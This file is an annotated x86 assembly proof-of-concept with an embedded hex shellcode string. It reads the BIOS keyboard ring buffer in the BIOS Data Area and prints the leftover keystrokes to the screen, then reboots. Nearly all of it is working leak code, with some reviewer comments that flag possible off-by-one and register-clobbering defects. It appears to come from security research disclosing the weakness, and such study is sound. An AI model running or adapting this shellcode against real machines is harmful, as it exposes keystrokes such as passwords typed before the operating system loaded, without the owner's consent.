;------------------- [ windows-poc.asm ] -----------------------;
;                                                               ;
; Jonathan Brossard // [email protected]                        ;
;                    [email protected]                          ;
;                                                               ;
; 16b shellcode, BIOS Api only used : aimed at being Xplatform  ;
; if run under virtual or real mode...                          ;
;                                                               ;
; Compiling : nasm -fbin ./windows-poc.asm -o biosleak.com      ;
;---------------------------------------------------------------;
;\x30\xe4\xb0\x40\x8e\xd8\xb0\x1c\x89\xc6\x30\xed\xb1\x10\x3e\x8b
;\x04\x30\xe4\x3c\x20\x72\x04\x3c\x7e\x72\x02\xb0\x20\x83\xc6\x02
;\x56\x51\x50\xb4\x03\x30\xff\xcd\x10\xb4\x02\xfe\xc2\xcd\x10\x58
;\xb4\x0a\xb3\x06\xb1\x01\xcd\x10\x59\x5e\xe2\xd2\x30\xe4\xb0\x4c
;\xcd\x21

org 100h                                ; .COM image: loaded at cs:0100h

section .text

;---------------------------------------------------------------;
; _start                                                        ;
; Walks 16 words of the BIOS Data Area (segment 0x40) starting  ;
; at offset 0x1c and echoes the low byte of each to the screen  ;
; through INT 10h, mapping anything non-printable to a space.   ;
; The area just after 0x40:0x1e is the BIOS keyboard ring       ;
; buffer, so what gets echoed is presumably whatever keystrokes ;
; are still sitting there (the "leak" the file name refers to). ;
;                                                               ;
; Register roles:                                               ;
;   ds = 0x0040  BDA segment                                    ;
;   si = offset of the word currently being read                ;
;   cx = words remaining (LOOP counter), 16 on entry            ;
;   al = character being printed                                ;
; Assumes a text video mode on display page 0 (INT 10h AH=0Ah   ;
; and the cursor bookkeeping below) -- not verified by the code ;
; itself.                                                       ;
; Not a real function: never returns, ends in INT 19h.          ;
;---------------------------------------------------------------;
_start:
        xor ah,ah
        mov al,0x40                     ; ax = 0x0040: BIOS Data Area segment
                                        ; (0x40:0x1e : keyboard buffer address)
        mov ds,ax
        mov al, 0x1c                    ; ah is still 0 from the xor above, so ax = 0x001c
        mov si, ax                      ; NOTE(review): si starts at 0x1c, one word *before*
                                        ; the 0x1e the comment names, so the first iteration
                                        ; echoes the BDA word at 0x40:0x1c and the walk stops
                                        ; one word short of 0x3c -- confirm this is intended
        xor ch,ch
        mov cl, 0x10                    ; cx = 16 words to visit

leakloop:
        mov ax, [ds:si]                 ; ax = word at ds:si (ascii in al, scan code in ah
                                        ; for keyboard-buffer entries)
        xor ah,ah                       ; drop the high byte, keep only the character
        cmp al, 0x20
        jb keepcopying                  ; al < 0x20  -> control char, substitute a space
        cmp al, 0x7e
        jb keepcopying2                 ; 0x20 <= al < 0x7e -> printable, keep as is
                                        ; (0x7e '~' and 0x7f fall through and are replaced
                                        ; as well: the test is jb, not jbe)
keepcopying:                            ; despite its name this is the *substitute* path
        mov al, 0x20                    ; non-printable -> ' '
keepcopying2:                           ; keep path
        add si, byte +0x2               ; next word; "byte" keeps the short imm8 encoding
                                        ; that the hex dump above expects
        ; Replace this line by add si,4
        ; if you plan to use it under MS-Dos
        ; due to imperfect emulation of 16b
        ; arch under windows.
        push si                         ; the INT 10h calls below clobber cx (AH=03h
        push cx                         ; returns the cursor shape in CH/CL) and we still
        push ax                         ; need al afterwards
        mov ah, 0x03                    ; INT 10h AH=03h: read cursor position -> dh=row, dl=col
        xor bh, bh                      ; bh = display page 0
        int 0x10
        mov ah, 0x02                    ; INT 10h AH=02h: set cursor position...
        inc dl                          ; ...one column to the right of where it was
        int 0x10
        pop ax                          ; al = character to print
        mov ah, 0ah                     ; INT 10h AH=0Ah: write character at cursor, cx times
        mov bl, 06h                     ; bl = colour; only meaningful in graphics modes
        mov cl, 0x01                    ; intended repeat count of 1
                                        ; NOTE(review): ch is NOT cleared here and still holds
                                        ; the cursor start line returned by AH=03h above, so
                                        ; cx is 0xNN01 rather than 0x0001 unless that byte was
                                        ; zero -- confirm on the target BIOS/emulator
        int 0x10
        pop cx
        pop si
        loop leakloop                   ; cx-- ; repeat while cx != 0

;----- Terminate as well as we can...
        xor ah,ah
        int 0x16                        ; INT 16h AH=00h: block until a key is pressed
        int 0x19                        ; INT 19h: BIOS bootstrap loader (warm restart);
                                        ; there is no clean DOS/Windows exit on this path
;EOF